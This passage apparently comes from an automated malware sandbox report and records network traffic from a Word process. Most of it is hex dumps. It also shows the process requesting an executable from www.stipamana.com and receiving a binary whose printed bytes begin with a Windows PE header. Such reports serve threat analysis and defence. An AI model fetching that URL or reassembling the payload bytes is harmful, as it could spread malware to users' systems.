                                                                                                                                                2024-12-09 05:52:28 UTC16384INData Raw: 3d a9 ab 11 d6 4d 7d 11 c4 36 a5 dc 70 50 5b 2b 3e f8 0d fb 8d e1 39 60 89 4d 25 32 4c 0e 28 4d 42 b4 a1 e8 41 7e 49 9e 6b 3c a1 48 6d 8b dc d7 72 58 e7 a3 a1 7d 1c c8 25 19 43 c6 d9 32 62 fa e6 3c e5 29 07 f8 f7 f1 37 de 4b d8 8a e6 d1 e4 ab 93 cd 94 a5 41 d2 a2 05 bf f3 44 1d ba 5f a6 1e 13 65 d9 56 56 5b 64 d5 ab 81 7c d3 66 12 ef 81 b2 34 53 af ef ad a0 58 01 d0 08 a2 9c af 44 a6 cf 17 6c 3d e0 2c 2b 57 04 8f 32 36 da 75 fa 9a df 6f 59 c4 a1 fc dd e7 41 7c f3 c5 5d 04 95 62 1b 6a 51 4b a6 2c 8b ed 29 03 85 22 c0 d5 13 4d e4 36 ac 39 08 17 c1 b8 16 25 58 a4 98 f3 77 50 36 be 65 6c 75 a3 14 62 a3 fd aa 47 65 76 3b b0 64 d2 c3 4a 42 2d 71 b4 b4 5c af c8 b7 1e 46 f9 1e 9a 58 34 b5 ce 95 e3 a4 64 2c 6a c0 11 50 e2 ba 35 d2 68 c6 4f 48 63 0d 60 45 f3 20 69
                                                                                                                                                Data Ascii: =M}6pP[+>9`M%2L(MBA~Ik<HmrX}%C2b<)7KAD_eVV[d|f4SXDl=,+W26uoYA|]bjQK,)"M69%XwP6elubGev;dJB-q\FX4d,jP5hOHc`E i
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: 6a 2b 00 44 06 b6 27 45 a4 d0 04 cb ee 0d 48 dd b9 75 cf 1c 58 16 05 f4 09 3c 0d 92 89 8a 34 68 42 61 72 2d 01 66 fa 83 0d 07 a4 ec 23 cd 22 63 71 02 0e 4e 2d ca 02 64 21 72 ce b9 99 93 8f f7 27 d1 a8 fd b3 cf 3e d5 02 fe 26 fa a3 43 e5 01 94 28 79 b0 b5 04 24 27 4c 18 17 59 74 40 09 59 20 d4 8d 73 0a e1 c7 0e 50 13 10 03 71 00 6c 39 6d 01 a4 c9 c5 02 50 03 2c 2c 6c 14 35 c8 2a b7 6f df 12 d9 7a 28 56 d8 7f 6c 2d 01 4c 6c 48 87 0f ff 21 02 26 c0 3d 6e 1c 60 47 54 70 fa d2 5f 60 39 20 fa d5 03 82 d3 a6 a5 14 a7 d4 eb d0 6f fc e6 d9 00 1b cf 04 fc a0 de 38 52 d6 c6 71 f1 3a 01 79 01 33 d8 58 c0 07 ca 8e 7b a0 90 01 3c 80 92 7e 52 af b3 1a 52 9f 73 d9 b0 21 51 17 36 b3 6c 0e 8e dc c4 98 30 06 79 02 2e c6 1b d7 4c 1b cf 43 19 e3 a2 69 0a d7 e2 00 ea a7 2c 80
                                                                                                                                                Data Ascii: j+D'EHuX<4hBar-f#"cqN-d!r'>&C(y$'LYt@Y sPql9mP,,l5*oz(Vl-LlH!&=n`GTp_`9 o8Rq:y3X{<~RRs!Q6l0y.LCi,
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: d1 22 01 28 01 12 e4 9b 28 8f 78 2e 94 25 c0 cc f3 9c 0e 02 a1 3d cf 04 f4 60 bf f1 ce 41 fb 89 22 09 ea 12 80 a6 1d 50 88 2c 14 03 2b df b9 0f 8a 12 a0 24 25 04 d1 8f 50 f4 ac 59 bd 26 fe a6 be 39 0a c0 31 54 60 f3 59 cf 4f 23 48 22 b7 84 1d 1d 34 44 0b 57 94 d0 50 2d f6 09 02 25 58 59 58 f1 03 52 46 b0 11 2c 5b ba 24 ca ec ac 68 99 ab 7a 48 68 46 ca dc 7f fc e3 39 b1 e5 af c7 c5 4f 4e f2 24 8e 18 a7 3e 4c 88 a0 c7 58 90 12 03 aa 92 3a d8 44 60 63 5f 79 e5 e5 f8 c9 18 21 9e 80 65 07 2c 51 a2 40 95 22 97 84 5a c7 80 3f b5 5f 2e 9d da 88 f0 68 42 3e 3a 78 30 b2 bc 21 11 50 19 eb b1 3a 46 0b 60 c7 23 5b 14 30 12 b1 09 30 24 4a 13 9f f3 a5 7c db 25 f0 47 33 be 6e c3 5a 51 a2 b3 62 e8 bb 19 02 c8 18 05 6a ad c6 4a ed 44 2c 30 74 c8 e0 48 45 93 e5 92 8d 61 92
                                                                                                                                                Data Ascii: "((x.%=`A"P,+$%PY&91T`YO#H"4DWP-%XYXRF,[$hzHhF9ON$>LX:D`c_y!e,Q@"Z?_.hB>:x0!P:F`#[00$J|%G3nZQbjJD,0tHEa
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: 83 78 dd 12 e3 d4 58 ed cb 78 70 99 57 cd d5 8c 1f 70 9a 13 9c cb 3e 58 f6 c1 ed 97 9c 81 9e b3 2c dd 00 2c 03 37 83 ac 78 36 05 63 ad b1 da d2 72 f3 99 46 61 c7 8f 07 39 ba f4 c5 39 5e 6e 72 e4 f2 6c 14 96 c5 23 be ff be 36 06 fb 2e b6 f9 3e 4a bf b9 41 bf 89 fd 34 01 3b 12 d6 d3 91 b0 a4 b8 9d c8 cf 49 b2 f6 1e 08 3b 3f 10 f6 ea ef 6c 94 96 12 cc 1c 23 90 94 85 cf aa 43 de 5b 67 dc 16 56 9a 25 15 2b b8 8c 16 9f 39 56 21 a5 c7 83 02 d1 1b 29 bc 90 b1 63 f1 4a 76 28 61 e5 dc ed 46 6d 95 a8 9d e0 6c fc 4d d2 76 ca 08 93 d0 ed 73 4b 6d bc 56 e5 85 d9 b4 ac 8e 2b 1e 12 03 24 fd 5a 09 de e7 31 07 f1 b0 21 f9 b4 28 82 ac a8 c8 91 81 f7 e6 fa db 81 06 6c 65 ee e3 3a 74 84 2c cb 57 1a a7 85 64 55 9f a3 98 3b f3 4c d5 63 1b f3 ee fd b7 ce 53 0a 1d ff 4f 5c 6b a8
                                                                                                                                                Data Ascii: xXxpWp>X,,7x6crFa99^nrl#6.>JA4;I;?l#C[gV%+9V!)cJv(aFmlMvsKmV+$Z1!(le:t,WdU;LcSO\k
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: 03 c5 36 db 42 f5 b3 3f 88 ee df c4 dc d8 2e 7b f3 e0 5c e2 5a a2 0a b1 2a 55 2b 02 96 7a d5 74 ba c4 cd c4 0e f0 c9 f8 63 e7 eb 70 a5 d8 9a 56 64 12 e6 33 7e d9 ed 06 1c 09 a0 d3 75 4f 97 be b9 ff 70 09 a8 e1 a4 9b fd 9b bf 3f 03 3f 65 06 ce 39 b0 1c 7d 8c ab 16 65 e8 26 6d c3 93 04 80 5b c3 c2 ab dd 20 2b 69 1c a7 72 07 0e 66 00 e4 9a 8f 3f 6a 7d 1c 56 28 0b d0 b6 47 a2 27 cc 57 01 98 e4 93 07 0f 1f 68 1d fb 26 48 e5 aa e0 c4 39 be 89 e3 21 91 4b 92 1c 09 32 fb b1 00 4b d2 c4 6f ad 0f f0 dc 1b c7 fd 3c 00 f6 70 10 d7 bb 15 cb 05 60 9f c7 18 3e 8d b8 e9 96 58 bc 3f 16 00 dc fc 27 36 f9 65 00 e4 17 9a a6 85 cb dc 99 b9 fe 3a 40 71 5f b4 9b 50 68 03 bf d2 b6 df 07 18 37 ff 25 60 51 f6 20 a1 27 31 1d 29 7d a4 9e 34 f6 d3 f3 86 ab 0e 68 bd da df ab 6b f6 de
                                                                                                                                                Data Ascii: 6B?.{\Z*U+ztcpVd3~uOp??e9}e&m[ +irf?j}V(G'Wh&H9!K2Ko<p`>X?'6e:@q_Ph7%`Q '1)}4hk
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: f4 b7 ef 36 03 3d 0b 96 9d ee 77 de 1c 69 45 28 88 80 bc 2e 8b 8c 98 cd ea 03 30 2c 42 a0 28 29 03 74 14 76 90 b5 46 fb 91 79 96 e8 61 3d 52 e2 70 8f 81 9c a4 8c fd b9 da c0 cb c2 0d 67 4d 02 cb cc 7a b3 fc 64 b6 b3 7f 0d e0 e4 42 b3 1a 81 66 16 a5 00 a6 96 04 ce 74 d5 d3 02 f5 4a 86 98 9d 17 9d 07 20 7f fd b5 8a f0 75 9c 8e 4b da a8 a3 21 d0 d4 7f 06 d7 50 51 de a1 ca 95 a4 f2 b4 2b a3 77 03 cd 66 31 e0 fc bc b9 ae 82 2c b0 55 65 5e db 8c 1a df 4c f7 5b 7c 18 58 5a 06 c1 32 7c e7 0a 44 d5 0d 2f 05 76 4b 0b 87 66 c5 f2 0a 84 43 a1 b2 6e 61 cb 5a c1 7c a0 12 d0 29 24 88 4d d0 eb f6 be db 6f a6 7f db f7 67 e0 6c cd 40 4f 82 65 e7 c5 75 73 c7 b2 42 b9 1e 3c a8 3a cd 26 59 49 b8 c6 7d 54 a4 57 ec 0d 7f 11 81 1d ed 27 15 2c 62 91 ac 45 19 68 ee 36 b7 1b c8 d6
                                                                                                                                                Data Ascii: 6=wiE(.0,B()tvFya=RpgMzdBftJ uK!PQ+wf1,Ue^L[|XZ2|D/vKfCnaZ|)$Mogl@OeusB<:&YI}TW',bEh6
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: d2 8d 13 39 de cd ab 2a 78 c6 d2 e4 b7 7b 8a fe eb ba 9c 07 67 73 22 47 60 c2 82 a5 68 41 e4 50 0b 24 d5 bf bb 29 aa ac cf 14 0d 71 79 6d 79 9f a2 a6 ba 32 92 c8 b9 48 45 35 b5 51 03 12 34 10 75 01 ff c0 55 b1 48 fd 1a 39 de f0 d2 48 f1 5c 4c 2e 76 00 f9 71 74 ca 22 9f 1a 55 56 de 9e cf 56 97 47 8f cd b6 1a 40 11 f5 16 b9 60 79 dd f6 87 2b b4 2e 6a 91 71 d1 54 73 8d cc fb df e5 c2 3f 10 f5 8e 69 32 6d 38 8d f8 0f 9a 79 04 14 81 99 c8 4d 74 b9 3b aa a3 2f 13 dd 92 49 56 b0 d4 80 63 7f ce 09 68 35 12 48 8a 1b db 24 9b 44 44 3f 44 5c 58 c0 ae 50 6b f2 9e ed da 0f 60 fc e2 40 a4 91 01 3b 80 2a 72 3c 14 b9 22 0b 5e 52 4b 8a 22 11 a9 d7 9b 31 2a 5b 29 63 f4 c3 8f 91 6f e6 f5 ef 12 8d 7b de 06 ca e6 c7 aa 07 29 07 cd 38 52 66 1c 8d 7b 25 97 db 56 1b 2c 45 98 55
                                                                                                                                                Data Ascii: 9*x{gs"G`hAP$)qymy2HE5Q4uUH9H\L.vqt"UVVG@`y+.jqTs?i2m8yMt;/IVch5H$DD?D\XPk`@;*r<"^RK"1*[)co{)8Rf{%V,EU
                                                                                                                                                2024-12-09 05:52:29 UTC16384INData Raw: f4 8b 20 bb a7 e0 03 b0 9c a8 50 31 38 ae 09 07 96 a6 ac 8a 20 22 20 53 4e 39 30 72 45 c5 1d c0 20 9a a4 09 07 90 fe 0d 44 ac 03 1c 81 a4 a2 89 62 0f 20 01 a0 22 52 d3 5d d1 ce f5 f1 bf be 26 ca 16 d1 90 05 30 dc 7d f7 9c 12 65 22 a5 b3 95 05 86 14 3d ac 67 4d bd 3d 56 05 8d 29 68 6d ae 21 c2 04 28 00 d3 74 5d 84 39 7f fe bc 00 ca b4 00 cf 65 05 64 90 ca 5f 79 65 5d 99 2e 4b 2f 88 30 1d a3 e3 06 58 80 d1 d4 1b f0 cf 9d 7b 57 a2 b9 85 25 d7 e7 06 e0 3c 81 67 4d 21 28 fc 00 4a d1 a9 1b 82 fc 6c 25 e2 03 3d d3 ef 99 31 1d 63 2a b6 3a d3 6b 85 1e 63 b0 2c 6a a4 d9 c9 65 56 00 06 98 33 67 ce 2a a9 0b fb aa e3 ec 9c dd 28 e8 cd 9d 9b 9b 81 f3 ab e7 0f 40 a5 21 aa b2 49 54 e9 a6 c0 81 d2 8d 81 8e dd 78 3f f9 e4 53 99 8e 2f cb 14 fc c9 52 60 43 6d 6a 4f c3 5d 72
                                                                                                                                                Data Ascii: P18 " SN90rE Db "R]&0}e"=gM=V)hm!(t]9ed_ye].K/0X{W%<gM!(Jl%=1c*:kc,jeV3g*(@!ITx?S/R`CmjO]r


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.74972794.156.167.574437240C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-09 05:52:36 UTC404OUTGET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Language: en-ch
                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: www.stipamana.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-09 05:52:37 UTC320INHTTP/1.1 200 OK
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 09 Dec 2024 05:52:36 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 177664
                                                                                                                                                Last-Modified: Mon, 09 Dec 2024 04:36:17 GMT
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "675673c1-2b600"
                                                                                                                                                Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                Cache-Control: max-age=315360000
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                2024-12-09 05:52:37 UTC16064INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 73 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9e 02 00 00 16 00 00 00 00 00 00 ee bd 02 00 00 20 00 00 00 c0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELsVg @ `
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 9b bc a7 b0 75 39 78 c2 8c 98 9d a5 9a 03 e3 c5 8f 0c 18 a1 2a e4 f0 20 49 27 66 e8 3c 01 93 07 eb cf 5e 6e a5 fb 87 b7 df be 83 49 50 1f 35 03 7d 15 5a 9b d9 4b d3 ed 2f b4 4b bc 35 45 2c 02 f7 90 97 6c b1 4d e3 2a 8e 06 17 96 d5 de f6 03 68 7f bc 6e c0 2d 03 52 cd bf 03 67 10 89 11 f3 0d 64 19 d7 0b b4 7d 49 95 e9 a9 94 15 87 64 e8 c9 6a fc fa 73 35 14 32 72 fd 39 dd 08 7d f0 51 ca 3b 4b bf bf 06 14 6f 73 84 f5 62 61 bd 2a 53 a8 31 97 05 83 f2 21 ff 21 d0 5c 9f 95 b7 43 fa b2 dd c0 3f 97 a4 92 9b 67 1c 18 38 cb 1c d4 02 ba 75 db 28 77 f9 5e 14 f5 5e de ca 84 7a 66 0e ab f3 88 91 8e bc 67 c1 ea 79 5a 30 7a 0c 37 e9 44 d4 27 08 55 11 02 61 92 60 9b e3 af 40 6a 6c 3d 4d 50 e8 09 a7 44 aa 28 d2 eb 51 79 ca 51 dd 0a fe 10 b5 38 50 d0 ef 45 a6 51 aa f9 9e 4a
                                                                                                                                                Data Ascii: u9x* I'f<^nIP5}ZK/K5E,lM*hn-Rgd}Idjs52r9}Q;Kosba*S1!!\C?g8u(w^^zfgyZ0z7D'Ua`@jl=MPD(QyQ8PEQJ
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 99 88 cf e3 2c 03 20 db 2b 51 c0 37 0f 26 ce 64 06 dd 69 f1 51 28 62 a4 b2 4b e6 60 cc 47 97 91 2d 93 26 70 7a 24 0e 6c 89 30 6c e4 20 2d a4 7a f1 92 1c 38 0a cd 3f 74 4d c8 07 ca 79 e6 c4 39 98 58 c4 a3 e3 3c 90 bd aa 32 03 a8 81 6e d1 b2 cb e6 d5 b8 cb 4b f7 51 43 d0 16 7e 15 f0 7e 3a 8d 31 dc 41 05 d6 85 bc a3 fe d9 8a ef a6 13 b4 52 7d fc dd 0d 51 71 b0 15 e2 64 63 db c7 f0 f6 b8 d3 53 6f 01 5c 56 1c 67 0c 92 6b 6b f5 d3 a5 e3 c7 e6 91 d4 ca 99 64 6a 62 ef 38 b8 e5 e9 74 23 1b 93 1b 80 b1 8c 10 10 66 33 f5 fa 20 f0 34 fb a8 56 ff 2b bb a6 8a 49 46 b6 ae 05 2f f2 04 00 bf 89 df ca 8a 3a df a7 a9 84 42 ff 9b f8 9e 38 7c b0 47 f4 67 a0 b8 b1 5d e1 bd 1b 5f a0 f7 91 63 8d f9 00 24 65 f0 c1 2e 76 ef cc 4b 77 aa 4b 46 9c ae e3 e5 1c fa c4 b2 c8 a1 09 d8 ba
                                                                                                                                                Data Ascii: , +Q7&diQ(bK`G-&pz$l0l -z8?tMy9X<2nKQC~~:1AR}QqdcSo\Vgkkdjb8t#f3 4V+IF/:B8|Gg]_c$e.vKwKF
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 9a 94 8a b5 de 4e 1a be c2 55 13 21 5f 08 4c c7 6d 8e 14 ee 7b 24 cc 2b b6 e0 60 e5 80 c5 d4 18 a2 b2 f0 bd cd 9d 7f cf 99 e4 20 54 27 d2 36 05 57 f7 b6 16 c2 11 89 3f 58 78 70 04 0b e8 f4 8d 5b ea 7f d9 37 a2 7e bc f3 1c 9d 5f 1c 0a 79 b5 e5 bb 95 83 9b ea b2 d2 42 6e b3 7a e7 21 5e d2 bf 3e 6f 49 06 e8 98 ad 94 11 56 ad 76 d2 ba 31 0a 83 0c 3c a9 59 cd b1 4a 8d 5c 98 56 64 40 d8 5b 3d 7a 55 4f 46 f1 0b b7 a4 c9 a8 6c 8f 85 fb 2c af f3 6a 1a 9f cd 6c db fe 17 c1 bd 22 84 6d 4c d8 a2 ce b9 4f 3f 35 c8 11 9a 28 24 af 93 f5 f0 4c 99 a6 3c b7 48 3a 09 42 9e 33 8f 5d 39 ac 41 a3 cf 08 14 ae e4 45 5c 9b 18 78 49 be 1c 8d d9 51 85 48 0f 90 d6 48 5d 62 df 4c 4f 75 f4 95 41 1f c9 59 9a c9 56 0d 14 2d 53 49 2c 1a 5a 9d bf 7d 04 9c ea fd e8 ea f2 d3 14 2c 31 3d 1f
                                                                                                                                                Data Ascii: NU!_Lm{$+` T'6W?Xxp[7~_yBnz!^>oIVv1<YJ\Vd@[=zUOFl,jl"mLO?5($L<H:B3]9AE\xIQHH]bLOuAYV-SI,Z},1=
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 67 82 2c 04 d4 e7 5a 48 7b ba b5 0a 02 ed d0 49 cc 9b 24 c5 e3 34 49 5b a9 be be af 41 c7 a0 4f e7 bb 15 72 f3 28 6b 15 65 1f 81 75 a3 63 73 00 11 9a df e1 02 04 2a f2 5b 72 a2 ee 85 8f 21 47 dc 07 69 c1 69 2e 60 ca 0b 07 ce 21 d1 0a 45 a1 f5 d1 e1 48 4c 25 5c 33 87 c0 17 e3 3b a0 eb cb 29 ad e9 68 41 56 5a 5e b7 57 df 8c 5e 49 bc 47 46 19 bb 98 58 2a f1 e9 05 e9 fb 9b dc 3f 1a 3f 03 3b da 7e 7a 99 9c 82 e6 98 0d 10 3b 56 7b 79 8d 06 30 02 fe 73 09 49 0a 3b 42 d1 51 23 05 3d 4e 85 35 e5 03 8e 2c 45 77 78 b8 a0 e2 0f 46 5b 41 47 d4 fa 42 7b 4e 67 1a 37 ef f3 fb 15 5c ee 90 b6 9c ee bb 28 85 b7 5d a7 f3 a5 02 36 01 02 6d eb 1a b9 d3 f0 59 92 9d fb c7 ef 51 c1 62 69 c3 27 83 6e 26 10 e7 e5 60 5a 9f 88 4e 2a 28 45 0c 9b 0c c4 c7 0c e5 95 42 ee 8d c8 4a 2a 8c
                                                                                                                                                Data Ascii: g,ZH{I$4I[AOr(keucs*[r!Gii.`!EHL%\3;)hAVZ^W^IGFX*??;~z;V{y0sI;BQ#=N5,EwxF[AGB{Ng7\(]6mYQbi'n&`ZN*(EBJ*
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 13 b5 05 39 0d 0c 82 e9 eb d1 cc af ac 87 f1 95 25 9c a9 73 7d bc 6b 68 83 7e 5c f7 e2 31 68 c6 4b 44 71 e3 22 06 5f 6a 57 92 ce f4 81 d0 1a 36 6f 58 0a 77 62 5c 92 53 11 1b 74 66 af 7c c0 ad 2a 31 20 30 3e e0 64 6f a0 2d 07 44 28 9c 48 fb c4 4e 38 27 26 76 30 44 cf 29 0e 0d da f4 fa a8 03 4a 4b 15 26 90 1d 9f b0 05 af ed d9 b2 9f ba eb 96 9e 0a c5 19 1a 9a 3c 2f 6f 22 4c d0 06 bb bf 1e 43 6f e8 1f 83 04 29 d5 2e 04 5a 2d 89 07 8d c9 6b c3 19 60 78 65 24 e9 7e 25 cf b1 dd c0 ce fa b2 2c c8 0f 2d 6d 69 c5 9a 2c bc 77 50 71 cd 6d 4c 18 43 c2 f0 46 23 ea 59 c6 e7 13 b7 dd 11 be ee d6 93 cc 4a f0 2f 7d b5 ef 7b b8 bd c4 c6 ac fe ac e7 39 f4 93 df 4c 0f 58 f9 ec e7 dc aa af 8e 22 6c d1 ff 54 7b 47 e1 b8 45 02 68 50 f9 41 c3 6c b2 a8 92 2c 13 ba d9 33 2e f2 5b
                                                                                                                                                Data Ascii: 9%s}kh~\1hKDq"_jW6oXwb\Stf|*1 0>do-D(HN8'&v0D)JK&</o"LCo).Z-k`xe$~%,-mi,wPqmLCF#YJ/}{9LX"lT{GEhPAl,3.[
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: a9 c2 cd 3c f3 ca a1 81 76 7e de 6a 84 2b df 90 cb da 07 3b 7f 7b 9f bc 2f fc e9 66 5e 4b 65 52 24 77 bc 96 72 5a f3 51 7d e8 c5 1e a0 91 4c e7 aa db 0c cd 82 09 7b 50 a7 34 d7 e6 75 d6 45 c6 b0 0c 71 9f 0d 47 04 97 30 7c af fd 03 20 82 9f a0 d2 29 7b ed 86 46 7f ae ed ea 80 0b ed 10 f9 5b 11 f9 f9 3a b4 a4 66 e9 d3 4b 41 81 bf a9 0a 39 c3 a9 76 0f e3 69 ea 16 93 72 72 7d 38 b3 83 9e b2 af d8 af 67 fb 6e b6 83 20 f9 0c d7 4e f2 98 d5 57 a6 e0 8b 58 58 66 3f d0 ef 75 a1 21 c7 c7 71 42 10 54 bd 7b 02 2b 63 81 c8 63 63 cb 0b d4 61 15 f3 65 3b 37 0d c6 af 7b 8e 73 51 fc 2c 83 ef 51 0f 29 67 bc 22 54 73 c3 5c a1 ae 3e 2d 77 fb de 87 79 6f 80 83 ac f8 5f 25 de 08 f3 7c 54 cb 5d 92 bf 35 61 61 ee 53 b6 9b 6d 61 c5 25 94 18 ea 8f ba f1 a9 ee 2f a0 e4 23 85 26 02
                                                                                                                                                Data Ascii: <v~j+;{/f^KeR$wrZQ}L{P4uEqG0| ){F[:fKA9virr}8gn NWXXf?u!qBT{+cccae;7{sQ,Q)g"Ts\>-wyo_%|T]5aaSma%/#&
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: ab d2 b7 37 87 73 39 7a d0 5e c7 57 32 b6 40 4e e5 ba 0c f5 87 8e 55 0c 06 d2 47 cc 0c 93 53 ca 68 c3 8e 60 fc 6b 2c 1d de 17 e4 13 87 b7 d2 d2 2f b0 09 29 82 ad 8b 46 9d 95 ee 91 7b f2 09 8d 75 8a 9e 61 82 77 de f5 64 7a ca a6 e9 88 30 77 c8 39 d0 45 fb 8e f4 65 1a 84 36 d2 ec 69 ce 89 81 51 29 a5 5c 21 da 6d 40 0f 4d 0f ab 74 c2 ec 39 fc d1 97 88 6b 69 aa 4b 4e d1 d4 39 37 af e3 0c 03 03 d5 5b c4 db 05 51 17 7a 43 a6 9c 5b 5f a3 23 2b 26 49 41 4f 13 ef 1b fd 1d eb 87 86 8c 26 01 2d 17 1c 19 f8 87 54 71 84 fe 65 12 e4 c1 1f 03 9e ea a9 df 27 98 34 33 a2 dc 70 00 6b eb b4 51 23 44 9e e9 1c a6 13 63 73 68 6f 21 60 7f 5c 3c 9b 1e 61 c6 ee 11 df e4 7a 6d cc f8 2f 43 83 29 07 12 b5 d2 d5 6d 62 87 9b 01 2d 7f fe 23 7d 1c cf f1 52 9b 5c 07 53 cd eb ad c6 f1 39
                                                                                                                                                Data Ascii: 7s9z^W2@NUGSh`k,/)F{uawdz0w9Ee6iQ)\!m@Mt9kiKN97[QzC[_#+&IAO&-Tqe'43pkQ#Dcsho!`\<azm/C)mb-#}R\S9
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 53 cf 75 66 f4 85 1a 31 ef 25 84 2a 8a 92 3f f8 72 c0 47 d7 72 42 4b 44 c3 ab 4c b3 f5 12 f2 42 50 11 76 6f 5e 6a 3b cf d4 3d f3 13 e4 4a 8f 7f 68 93 58 42 fb c1 7c 59 26 68 b3 69 3b 6c a9 e8 5a b8 15 d9 19 84 90 5f d9 26 30 53 9a 73 39 bf b5 37 4a 91 a4 4d 2c 84 86 7d c9 94 fc 19 8c 31 97 7b aa 42 6c 11 c8 7e 68 68 f1 a3 35 16 88 fa 81 f6 41 55 d5 cf 3d 80 4c cf d6 8c d4 c6 16 ee 0f c5 4b b0 7d 92 91 88 51 50 9f 42 f1 9f 30 9a b9 a2 ab da 0a 55 73 4d 3c e8 e1 d1 f2 89 21 45 ad 7e 84 86 cc 1e ef 8f 29 22 ab ca 55 a9 38 71 5d a3 90 63 b4 26 85 41 e4 31 6e 84 93 5d 8d 53 a4 8c 71 11 95 32 66 27 92 d3 df 5e 7f dc f7 01 f7 98 43 39 64 ef 61 43 b7 21 6c d8 50 48 91 0f ad 1b cd 94 c3 40 27 ca 7e 99 ef 87 97 f4 81 78 4f 44 ad 45 b6 c9 69 fb 77 45 56 31 39 4a f2
                                                                                                                                                Data Ascii: Suf1%*?rGrBKDLBPvo^j;=JhXB|Y&hi;lZ_&0Ss97JM,}1{Bl~hh5AU=LK}QPB0UsM<!E~)"U8q]c&A1n]Sq2f'^C9daC!lPH@'~xODEiwEV19J
                                                                                                                                                2024-12-09 05:52:37 UTC16384INData Raw: 06 44 77 fd ff ff 02 7b 3d 00 00 04 6f 64 00 00 06 02 7b 3d 00 00 04 6f 63 00 00 06 02 7b 40 00 00 04 6f 47 00 00 06 2a 13 30 04 00 4e 00 00 00 10 00 00 11 03 16 91 1f 09 5d 0a 03 16 91 1f 09 5b 25 1b 5d 0b 1b 5b 0c 16 0d 16 13 04 2b 17 09 03 17 11 04 58 91 11 04 1e 5a 1f 1f 5f 62 58 0d 11 04 17 58 13 04 11 04 1a 32 e4 02 09 28 4c 00 00 06 02 07 06 28 4d 00 00 06 02 08 28 4e 00 00 06 2a 00 00 13 30 03 00 3d 00 00 00 09 00 00 11 02 7b 4c 00 00 04 0a 2b 28 02 7b 47 00 00 04 06 19 73 41 00 00 06 a4 0d 00 00 02 02 7b 48 00 00 04 06 19 73 41 00 00 06 a4 0d 00 00 02 06 17 58 0a 06 03 37 d4 02 03 7d 4c 00 00 04 2a 00 00 00 13 30 02 00 55 00 00 00 09 00 00 11 02 7c 49 00 00 04 28 3f 00 00 06 16 0a 2b 26 02 7b 47 00 00 04 06 8f 0d 00 00 02 28 42 00 00 06 02 7b 48
                                                                                                                                                Data Ascii: Dw{=od{=oc{@oG*0N][%][+XZ_bXX2(L(M(N*0={L+({GsA{HsAX7}L*0U|I(?+&{G(B{H


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.74972852.123.243.1814437240C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-09 05:52:37 UTC807OUTGET /config/v2/Office/word/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7bF43EFEF1-5530-47E1-A9BD-92EAF33B7348%7d&Application=word&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bA0E72725-605B-4822-B4DB-BD5E739C51EF%7d&LabMachine=false HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                If-None-Match: ""
                                                                                                                                                User-Agent: Microsoft Office 2014
                                                                                                                                                DisableExperiments: false
                                                                                                                                                X-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130
